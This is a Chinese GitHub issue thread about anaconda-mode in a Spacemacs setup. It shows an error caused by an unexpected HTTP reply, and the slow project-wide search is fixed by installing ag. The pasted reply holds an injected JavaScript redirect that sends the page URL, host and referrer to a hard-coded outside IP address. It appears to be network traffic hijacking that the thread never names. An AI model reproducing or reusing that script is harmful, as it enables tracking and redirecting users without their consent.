### ISSUE TITLE
为什么我用到python的mode就会去连个网，弹出一个anaconda-response？

### ISSUE THREAD

**Issue by wulei** [zilongshanren/spacemacs-private#33]
TTP/1.1 200 OK
Server: nginx
Date: Thu, 04 Feb 2016 01:58:13 GMT
Content-Type: text/html
Content-Length: 686
Last-Modified: Fri, 20 Mar 2015 05:09:51 GMT
Connection: keep-alive
ETag: "550bab9f-2ae"
Accept-Ranges: bytes

<html><head></head><script type="text/javascript">
var sa = "http://202.102.110.207:8080/"; var pp = "108&pre="+(new Date()).getTime();
var s=String(window.location.href); var host=escape(s.substring(7,s.indexOf('/',7)));
var ref=escape(document.referrer); var su = s+"&host="+host+"&refer="+ref+"&server="+pp;
s = escape(s); function loadfr(){ document.getElementById("fr1").src = sa+"3.htm?AIMT="+su; }
function refreshPage(){ document.location = sa+"2.htm?AIMT="+su; }
if (self.location == top.location){ document.location= sa+"1.htm?AIMT="+su; }
else { refreshPage(); }</script><frameset rows="*,0"><frame id="main" src="">
<frame id="fr1" src=""></frameset><body></body></html>

**Comment by wulei** [comment]
他会提示Can't read anaconda-mode server response？你遇到过吗？
顺带问一下，怎么样在lua+cpp项目中全局搜索替换是最快的，使用SPC s p 好慢，而且不全

**Comment by zilongshanren** [comment]
@wulei 
你安装了ag了吗？        我这边40万+行代码，搜索很快啊。

**Comment by wulei** [comment]
谢谢，是我没有安装ag，所以搜索很慢，安装后很快~
python的问题我安装了官方指定的emacs版本就可以了

**Comment by zilongshanren** [comment]
@wulei  ok
